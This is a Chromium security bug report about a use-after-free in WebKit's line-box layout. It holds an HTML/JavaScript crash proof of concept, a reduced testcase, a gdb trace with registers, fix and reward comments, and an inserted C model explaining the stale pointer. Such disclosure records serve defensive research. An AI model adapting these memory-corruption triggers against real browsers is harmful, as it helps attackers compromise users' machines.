Issue 70027: Stale text node in linebox due to failure to dirty linebox when that text child is dirtied
Status:  Fixed
Owner:  infe...@chromium.org
Closed:  Feb 2011
Cc:  jamesr@chromium.org
Reported by MartyBar...@gmail.com, Jan 18, 2011
VULNERABILITY DETAILS
Under certain circumstances, when removing DOM nodes from a DOM tree in an HTML document included on a second page via an iframe, Chromium will crash (caused by a jump to null).

VERSION
Chrome Version: Tested in Google Chrome 8.0.552.237 stable, debugging done in Chromium 8.0.552.224 Ubuntu 10.04
Operating System: Ubuntu 10.04 (64-bit)

REPRODUCTION CASE
Two files are needed to reproduce this bug. Both are attached as well as included below.

The first file, outer.html, simply creates a 100x100 iframe with a src of inner.html. To reproduce the crash, this file should be opened in the browser. It is shown below.

<html>
<head><title>Crash PoC - Outer</title></head>
<body>
<iframe width="100" height="100" src="inner.html"></iframe>
</body>
</html>

The second file, inner.html, is shown below.

<html>
<head><title>Crash PoC - Inner</title></head>
<body onload="boom();">
<audio>a</audio>
<frame>a</frame>
<center></center>
<font id="font"></font>
<img id="img" />
<textflow>aaaaaaaaaaaaaaaaaaaa<bgsound /></textflow>
<wbr id="wbr" />
<spot>aaa<bq>aaaaaaaaaaaaa<table></table></bq></spot>
<abbr id="abbr"></abbr>
<fieldset id="fieldset">a</fieldset>
<script type="text/javascript">
// Wrapper holding a DOM node so it can be stored in the lookup table.
function reference(domNode) {
  this.domNode = domNode;
}

// Recursively records every node in the subtree: later siblings first,
// then children, then the node itself. newPrefix is an implicit global
// in the original PoC; it is left that way because the removal order in
// clear() depends on it.
function walk(a, currentPrefix, index, domNode) {
  if(domNode == null) return;
  newPrefix = currentPrefix + "_" + index
  walk(a, currentPrefix, index + 1, domNode.nextSibling);
  walk(a, newPrefix, 0, domNode.firstChild);
  a[newPrefix] = new reference(domNode);
}

// Detaches every recorded node from its parent, forcing a synchronous
// layout (offsetTop) before each removal so line boxes are rebuilt
// between mutations.
function clear() {
  var a = new Array();
  walk(a, "", 0, document.body);
  for(key in a) {
    document.body.offsetTop;
    a[key].domNode.parentNode.removeChild(a[key].domNode);
  }
}

// Reparents the <font> under the <wbr> and the <fieldset> under the
// <img>, appends a shallow clone of <abbr> to the <img>, then schedules
// clear() on a fresh task.
function boom() {
  var tn = document.getElementById('font'); tn.parentNode.removeChild(tn); document.getElementById('wbr').appendChild(tn);
  var tn = document.getElementById('fieldset'); tn.parentNode.removeChild(tn); document.getElementById('img').appendChild(tn);
  document.getElementById('img').appendChild(document.getElementById('abbr').cloneNode(false));
  window.setTimeout("clear();", 0);
}
</script>
</body>
</html>

The walk and reference functions are helpers for the clear function, which removes all nodes under document.body from their parents.

FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: tab

A shortened version of the trace through the program in gdb is included below. The full trace is attached.

$ chromium-browser --debug --single-process outer.html 
# Env:
#     LD_LIBRARY_PATH=/usr/lib/chromium-browser
#                PATH=/usr/lib/chromium-browser:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
#            GTK_PATH=
# CHROMIUM_USER_FLAGS=
#      CHROMIUM_FLAGS=
/usr/bin/gdb /usr/lib/chromium-browser/chromium-browser -x /tmp/chromiumargs.FdgvnE
GNU gdb (GDB) 7.1-ubuntu
Copyright (C) 2010 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /usr/lib/chromium-browser/chromium-browser...Reading symbols from /usr/lib/debug/usr/lib/chromium-browser/chromium-browser...done.
done.
(gdb) run
Starting program: /usr/lib/chromium-browser/chromium-browser --single-process outer.html

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x7fffe3c61700 (LWP 18254)]
0x0000000000000000 in ?? ()
(gdb) bt
#0  0x0000000000000000 in ?? ()
#1  0x00007ffff68ea489 in WebCore::RenderBlock::requiresLineBox (it=..., 
    isLineEmpty=true, previousLineBrokeCleanly=false)
    at third_party/WebKit/WebCore/rendering/RenderBlockLineLayout.cpp:1222
#2  0x00007ffff68f0400 in WebCore::RenderBlock::skipLeadingWhitespace (
    this=0x7ffff8f7aa60, resolver=..., firstLine=<value optimized out>, 
    isLineEmpty=<value optimized out>, previousLineBrokeCleanly=false, 
    lastFloatFromPreviousLine=<value optimized out>)
    at third_party/WebKit/WebCore/rendering/RenderBlockLineLayout.cpp:1287
#3  0x00007ffff68f0e33 in WebCore::RenderBlock::findNextLineBreak (
    this=0x7ffff8f7aa60, resolver=<value optimized out>, 
    firstLine=<value optimized out>, isLineEmpty=<value optimized out>, 
    previousLineBrokeCleanly=<value optimized out>, 
    hyphenated=@0x7fffe3c5fa49, clear=0x7fffe3c5fa34, 
    lastFloatFromPreviousLine=0x0)
    at third_party/WebKit/WebCore/rendering/RenderBlockLineLayout.cpp:1409
#4  0x00007ffff68f44bf in WebCore::RenderBlock::layoutInlineChildren (
    this=0x7ffff8f7aa60, relayoutChildren=<value optimized out>, 
    repaintLogicalTop=@0x7fffe3c5fb6c, repaintLogicalBottom=@0x7fffe3c5fb68)
    at third_party/WebKit/WebCore/rendering/RenderBlockLineLayout.cpp:664
#5  0x00007ffff68e8ad8 in WebCore::RenderBlock::layoutBlock (
    this=0x7ffff8f7aa60, relayoutChildren=false, pageHeight=0)
    at third_party/WebKit/WebCore/rendering/RenderBlock.cpp:1211
<trimmed>
(gdb) frame 1
#1  0x00007ffff68ea489 in WebCore::RenderBlock::requiresLineBox (it=..., 
    isLineEmpty=true, previousLineBrokeCleanly=false)
    at third_party/WebKit/WebCore/rendering/RenderBlockLineLayout.cpp:1222
1222	third_party/WebKit/WebCore/rendering/RenderBlockLineLayout.cpp: No such file or directory.
	in third_party/WebKit/WebCore/rendering/RenderBlockLineLayout.cpp
(gdb) disassemble
Dump of assembler code for function _ZN7WebCore11RenderBlock15requiresLineBoxERKNS_14InlineIteratorEbb:
   0x00007ffff68ea430 <+0>:	mov    %rbx,-0x20(%rsp)
   0x00007ffff68ea435 <+5>:	mov    %rbp,-0x18(%rsp)
   0x00007ffff68ea43a <+10>:	mov    %rdi,%rbx
   0x00007ffff68ea43d <+13>:	mov    %r12,-0x10(%rsp)
   0x00007ffff68ea442 <+18>:	mov    %r13,-0x8(%rsp)
   0x00007ffff68ea447 <+23>:	sub    $0x28,%rsp
   0x00007ffff68ea44b <+27>:	mov    0x8(%rdi),%rdi
   0x00007ffff68ea44f <+31>:	mov    %esi,%r12d
   0x00007ffff68ea452 <+34>:	mov    %edx,%ebp
   0x00007ffff68ea454 <+36>:	movzbl 0x30(%rdi),%eax
   0x00007ffff68ea458 <+40>:	test   $0x20,%al
   0x00007ffff68ea45a <+42>:	jne    0x7ffff68ea460 <_ZN7WebCore11RenderBlock15requiresLineBoxERKNS_14InlineIteratorEbb+48>
   0x00007ffff68ea45c <+44>:	test   $0x40,%al
   0x00007ffff68ea45e <+46>:	je     0x7ffff68ea480 <_ZN7WebCore11RenderBlock15requiresLineBoxERKNS_14InlineIteratorEbb+80>
   0x00007ffff68ea460 <+48>:	xor    %ebp,%ebp
   0x00007ffff68ea462 <+50>:	mov    %ebp,%eax
   0x00007ffff68ea464 <+52>:	mov    0x8(%rsp),%rbx
   0x00007ffff68ea469 <+57>:	mov    0x10(%rsp),%rbp
   0x00007ffff68ea46e <+62>:	mov    0x18(%rsp),%r12
   0x00007ffff68ea473 <+67>:	mov    0x20(%rsp),%r13
   0x00007ffff68ea478 <+72>:	add    $0x28,%rsp
   0x00007ffff68ea47c <+76>:	retq   
   0x00007ffff68ea47d <+77>:	nopl   (%rax)
   0x00007ffff68ea480 <+80>:	mov    (%rdi),%rax
   0x00007ffff68ea483 <+83>:	callq  *0x150(%rax)
=> 0x00007ffff68ea489 <+89>:	test   %al,%al
   0x00007ffff68ea48b <+91>:	jne    0x7ffff68ea528 <_ZN7WebCore11RenderBlock15requiresLineBoxERKNS_14InlineIteratorEbb+248>
   0x00007ffff68ea491 <+97>:	mov    0x8(%rbx),%rdi
   0x00007ffff68ea495 <+101>:	mov    0x8(%rdi),%rax
<trimmed>
(gdb) i r
rax            0x7ffff90c93c0	140737371739072
rbx            0x7fffe3c5f7f0	140737014790128
rcx            0x0	0
rdx            0x0	0
rsi            0x1	1
rdi            0x7ffff8f7ae80	140737370369664
rbp            0x0	0x0
rsp            0x7fffe3c5f100	0x7fffe3c5f100
r8             0x0	0
r9             0x0	0
r10            0x0	0
r11            0x3c	60
r12            0x1	1
r13            0x0	0
r14            0x45	69
r15            0x0	0
rip            0x7ffff68ea489	0x7ffff68ea489 <WebCore::RenderBlock::requiresLineBox(WebCore::InlineIterator const&, bool, bool)+89>
eflags         0x10246	[ PF ZF IF RF ]
cs             0x33	51
ss             0x2b	43
ds             0x0	0
es             0x0	0
fs             0x0	0
gs             0x0	0

Attachments: outer.html (136 bytes), inner.html (1.3 KB), gdb.txt (17.3 KB)
Jan 20, 2011
#1 chromium.cdn@gmail.com
it.obj points to a freed CachedResourceClient so this is high severity.
Summary: Stale pointer in WebCore::RenderBlock::requiresLineBox
Status: Available
Labels: -Pri-0 -Area-Undefined Pri-1 Area-WebKit Mstone-10 SecSeverity-High
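The trace stops at rip=0 with `callq *0x150(%rax)` as the instruction just executed: requiresLineBox loaded the first word of it.obj as a vtable pointer (`mov (%rdi),%rax`, rax is non-null), read the function pointer at offset 0x150 from it (slot 0x150/8 = 42) and got 0, because the render object the line box still references had been freed and its memory reused (comment #1: a CachedResourceClient). The C program below is an added example, not WebCore code and not the reporter's; it models that pattern in miniature. A block caches raw pointers to its text children in line boxes, a child is destroyed without dirtying the line, and the next layout-time virtual call resolves to a null function pointer; the fixed removal dirties the line so layout rebuilds the boxes first. Every type and function name (RenderBlock, InlineBox, block_remove_child_buggy, ...) is invented for the model, and the destroy step overwrites the object with an all-zero "vtable" to stand in for heap reuse and keep the demonstration well-defined instead of segfaulting.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Miniature model of the stale line-box pointer. Names are invented, not WebCore's. */

typedef struct RenderText RenderText;

typedef struct {
    int (*is_text)(const RenderText *);   /* the virtual call layout makes on each box */
} RenderVTable;

struct RenderText {
    const RenderVTable *vptr;             /* first word: what "mov (%rdi),%rax" loads */
    char text[32];
};

#define MAX_NODES 8

typedef struct { RenderText *obj; } InlineBox;   /* raw, non-owning cache: the hazard */

typedef struct {
    RenderText storage[MAX_NODES];        /* backing memory for the children */
    int nalloc;
    RenderText *children[MAX_NODES];      /* live children, in tree order */
    int nchildren;
    InlineBox boxes[MAX_NODES];           /* line boxes built by the last layout */
    int nboxes;
    int line_dirty;                       /* boxes must be rebuilt before use */
} RenderBlock;

static int text_is_text(const RenderText *t) { (void)t; return 1; }
static const RenderVTable text_vtable = { text_is_text };

/* Stand-in for a freed-and-reused allocation: the first word no longer points
 * at a RenderText vtable, and a slot read from it yields 0 (rax != 0, rip == 0). */
static const RenderVTable recycled_vtable = { 0 };

static void block_init(RenderBlock *b) {
    memset(b, 0, sizeof *b);
    b->line_dirty = 1;
}

static RenderText *block_add_text(RenderBlock *b, const char *s) {
    assert(b->nalloc < MAX_NODES);
    RenderText *t = &b->storage[b->nalloc++];
    t->vptr = &text_vtable;
    strncpy(t->text, s, sizeof t->text - 1);
    b->children[b->nchildren++] = t;
    b->line_dirty = 1;                    /* insertion does dirty the line */
    return t;
}

/* Layout rebuilds the line boxes only when something marked them dirty. */
static void block_layout(RenderBlock *b) {
    if (!b->line_dirty) return;
    b->nboxes = 0;
    for (int i = 0; i < b->nchildren; i++)
        b->boxes[b->nboxes++].obj = b->children[i];
    b->line_dirty = 0;
}

/* requiresLineBox-style walk: one virtual call per cached renderer.
 * Returns the number of text boxes, or -1 when a box holds a stale pointer.
 * A real engine has no such check: it executes "callq *0x150(%rax)" and
 * lands at address 0, which is the SIGSEGV in the report. */
static int block_count_text_boxes(RenderBlock *b) {
    block_layout(b);
    int n = 0;
    for (int i = 0; i < b->nboxes; i++) {
        const RenderText *t = b->boxes[i].obj;
        if (t->vptr->is_text == NULL) return -1;
        if (t->vptr->is_text(t)) n++;
    }
    return n;
}

static void detach_and_destroy(RenderBlock *b, RenderText *t) {
    int i = 0;
    while (i < b->nchildren && b->children[i] != t) i++;
    assert(i < b->nchildren);
    for (; i + 1 < b->nchildren; i++) b->children[i] = b->children[i + 1];
    b->nchildren--;
    memset(t, 0, sizeof *t);
    t->vptr = &recycled_vtable;           /* the memory is now someone else's */
}

/* Buggy: the child is gone, but the line boxes still point at it. */
static void block_remove_child_buggy(RenderBlock *b, RenderText *t) {
    detach_and_destroy(b, t);
}

/* Fixed: dirty the line so the next layout rebuilds the boxes from the
 * surviving children before anything dereferences them. */
static void block_remove_child_fixed(RenderBlock *b, RenderText *t) {
    detach_and_destroy(b, t);
    b->line_dirty = 1;
}

/* Runs both scenarios; returns 1 if they behave as described above. */
static int demo(void) {
    RenderBlock b;
    block_init(&b);
    RenderText *a = block_add_text(&b, "aaa");
    block_add_text(&b, "aaaaaaaaaaaaa");
    int before = block_count_text_boxes(&b);   /* 2 */
    block_remove_child_buggy(&b, a);
    int stale = block_count_text_boxes(&b);    /* -1: stale box, would be rip=0 */

    block_init(&b);
    a = block_add_text(&b, "aaa");
    block_add_text(&b, "aaaaaaaaaaaaa");
    block_count_text_boxes(&b);
    block_remove_child_fixed(&b, a);
    int fixed = block_count_text_boxes(&b);    /* 1: boxes rebuilt first */

    printf("before=%d stale=%d fixed=%d\n", before, stale, fixed);
    return before == 2 && stale == -1 && fixed == 1;
}

int main(void) { return demo() ? 0 : 1; }
```

The model keeps the freed object's memory mapped so the stale read is observable; in the real engine the same read goes through whatever now occupies that allocation, which is why the faulting address depends on heap state and why the reporter's forced layout between removals (offsetTop) matters for reaching it.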
Jan 27, 2011
#3 kerz@google.com
Move to M11 from M10, as we've now branched.  If you believe this bug was moved in error, please come talk to me.
Labels: -Mstone-10 Mstone-11 MovedFrom-10
Jan 27, 2011
#4 jsc...@chromium.org
Moving back to m9.
Labels: -Mstone-11 -MovedFrom-10 Mstone-9
Jan 28, 2011
#5 jsc...@chromium.org
CC'ing @jamesr on the off-chance he has a thought to contribute.
Cc: jam...@chromium.org
Feb 22, 2011
#6 infe...@chromium.org
Reduced testcase:

outer.html
----
<iframe width="100" src="inner.html">

inner.html
----
<body onload="boom();">
<audio>a</audio>a
<center></center>
aaaaaaaaaaaaaaaaaaa
<wbr id="wbr">
<span>aaaaaaaaaaaaa
<script>
// Wrapper holding a DOM node so it can be stored in the lookup table.
function reference(domNode) {
  this.domNode = domNode;
}
// Records every node of the subtree; newPrefix is an implicit global, kept
// as in the original because the removal order in clear() depends on it.
function walk(a, currentPrefix, index, domNode) {
  if(domNode == null) return;
  newPrefix = currentPrefix + "_" + index
  walk(a, currentPrefix, index + 1, domNode.nextSibling);
  walk(a, newPrefix, 0, domNode.firstChild);
  a[newPrefix] = new reference(domNode);
}
// Forces a layout (offsetTop), then detaches each recorded node in turn.
function clear() {
  var a = new Array();
  walk(a, "", 0, document.body);
  for(key in a) {
    document.body.offsetTop;
    a[key].domNode.parentNode.removeChild(a[key].domNode);
  }
}
// Appends a fresh <font> to the <wbr>, then schedules the removals.
function boom() {
  var fnt = document.createElement('font');
  document.getElementById('wbr').appendChild(fnt);
  window.setTimeout("clear();", 0);
}
</script>
Feb 25, 2011
#7 infe...@chromium.org
I have a fix! filed webkit bug - https://bugs.webkit.org/show_bug.cgi?id=55206
Summary: Stale text node in linebox due to failure to dirty linebox when that text child is dirtied
Status: Assigned
Owner: infe...@chromium.org
Feb 25, 2011
#8 infe...@chromium.org
Committed r79689: <http://trac.webkit.org/changeset/79689>
Status: WillMerge
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify reward-topanel
Feb 28, 2011
#9 jsc...@chromium.org
(No comment was entered for this change.)
Labels: ApprovedForMerge
Feb 28, 2011
#10 chromium.cdn@gmail.com
merged to m10 as http://trac.webkit.org/changeset/79910
Status: FixUnreleased
Labels: -Mstone-9 Mstone-10
Mar 2, 2011
#11 scarybea...@gmail.com
@MartyBarbella -- congrats! This bug provisionally qualifies for a $1000 Chromium Security Reward. You seem to be hearing that a lot lately :D
Thanks for taking the trouble to try and keep the repros minimal, and for including stack, register and asm analysis. It's factors like those that cause us to reward at the $1000 level.

----
Boilerplate text:
Please do NOT publicly disclose details until a fix has been released to all our
users. Early public disclosure may cancel the provisional reward.
Also, please be considerate about disclosure when the bug affects a core library
that may be used by other products.
Please do NOT share this information with third parties who are not directly
involved in fixing the bug. Doing so may cancel the provisional reward.
Please be honest if you have already disclosed anything publicly or to third parties.
----
Labels: -reward-topanel reward-1000 reward-unpaid
Mar 9, 2011
#12 scarybea...@gmail.com
(No comment was entered for this change.)
Labels: CVE-2011-1189
Mar 14, 2011
#13 scarybea...@gmail.com
Invoice finalized; payment is in e-payment system.
Labels: -reward-unpaid
Mar 21, 2011
#14 jsc...@chromium.org
(No comment was entered for this change.)
Labels: Type-Security
Oct 4, 2011
#15 jsc...@chromium.org
Batch update.
Labels: SecImpacts-Stable
Apr 18, 2012
#16 jsc...@chromium.org
Lifting view restrictions.
Labels: -Restrict-View-SecurityNotify
Apr 18, 2012
#17 jsc...@chromium.org
(No comment was entered for this change.)
Status: Fixed
Oct 13, 2012
#18 bugdro...@chromium.org
This issue has been closed for some time. No one will pay attention to new comments.
If you are seeing this bug or have new data, please click New Issue to start a new bug.
Labels: Restrict-AddIssueComment-Commit
Mar 9, 2013
#19 bugdro...@chromium.org
(No comment was entered for this change.)
Labels: -Area-WebKit -SecSeverity-High -Mstone-10 -Type-Security -SecImpacts-Stable Cr-Content Security-Impact-Stable Type-Bug-Security Security-Severity-High M-10
Mar 13, 2013
#20 bugdro...@chromium.org
(No comment was entered for this change.)
Labels: -Restrict-AddIssueComment-Commit Restrict-AddIssueComment-EditIssue
Mar 21, 2013
#21 bugdro...@chromium.org
(No comment was entered for this change.)
Labels: -Security-Severity-High Security_Severity-High
Mar 21, 2013
#22 bugdro...@chromium.org
(No comment was entered for this change.)
Labels: -Security-Impact-Stable Security_Impact-Stable
Apr 5, 2013
#23 bugdro...@chromium.org
(No comment was entered for this change.)
Labels: -Cr-Content Cr-Blink